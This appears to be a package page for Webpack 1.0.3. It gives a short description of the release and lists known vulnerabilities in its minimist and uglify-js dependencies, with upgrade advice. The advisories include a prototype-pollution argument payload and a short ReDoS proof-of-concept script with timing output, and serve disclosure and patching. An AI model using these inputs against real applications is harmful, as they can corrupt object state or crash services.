Webpack version 1.0.3, released on February 27, 2014, represents a minor update to the popular JavaScript module bundler, building upon the foundation laid by version 1.0.1, released just days earlier on February 24, 2014. While the core functionality and feature set, focused around packaging CommonJs/AMD modules for browsers, splitting codebases into bundles, and supporting loaders for file preprocessing, remains consistent, the key difference lies in bug fixes and potential performance enhancements. Both versions share identical dependency requirements, including essential libraries such as async, clone, uglify-js, and enhanced-resolve, crucial for asynchronous operations, object cloning, code minification, and module resolution, respectively.
Similarly, the development dependencies, useful for testing and development workflows, are mirrored across both versions, incorporating tools like mocha and should for testing, express for server creation, and a variety of loaders for different file types like CSS, JSON, and CoffeeScript. For developers, upgrading from 1.0.1 to 1.0.3 would primarily be driven by the desire for a more stable and refined experience, benefiting from any resolved issues and optimizations introduced in the newer patch release. Though seemingly small, such updates can contribute to more robust builds and prevent unexpected errors during the bundling process, making it a worthwhile consideration for projects already leveraging Webpack.
All the vulnerabilities related to the version 1.0.3 of the package
Prototype Pollution in minimist
Affected versions of minimist are vulnerable to prototype pollution. Arguments are not properly sanitized, allowing an attacker to modify the prototype of Object, causing the addition or modification of an existing property that will exist on all objects.
Parsing the argument --__proto__.y=Polluted adds a y property with value Polluted to all objects. The argument --__proto__=Polluted raises and uncaught error and crashes the application.
This is exploitable if attackers have control over the arguments being passed to minimist.
Upgrade to versions 0.2.1, 1.2.3 or later.
Prototype Pollution in minimist
Minimist prior to 1.2.6 and 0.2.4 is vulnerable to Prototype Pollution via file index.js, function setKey() (lines 69-95).
Regular Expression Denial of Service in uglify-js
Versions of uglify-js prior to 2.6.0 are affected by a regular expression denial of service vulnerability when malicious inputs are passed into the parse() method.
var u = require('uglify-js');
var genstr = function (len, chr) {
var result = "";
for (i=0; i<=len; i++) {
result = result + chr;
}
return result;
}
u.parse("var a = " + genstr(process.argv[2], "1") + ".1ee7;");
$ time node test.js 10000
real 0m1.091s
user 0m1.047s
sys 0m0.039s
$ time node test.js 80000
real 0m6.486s
user 0m6.229s
sys 0m0.094s
Update to version 2.6.0 or later.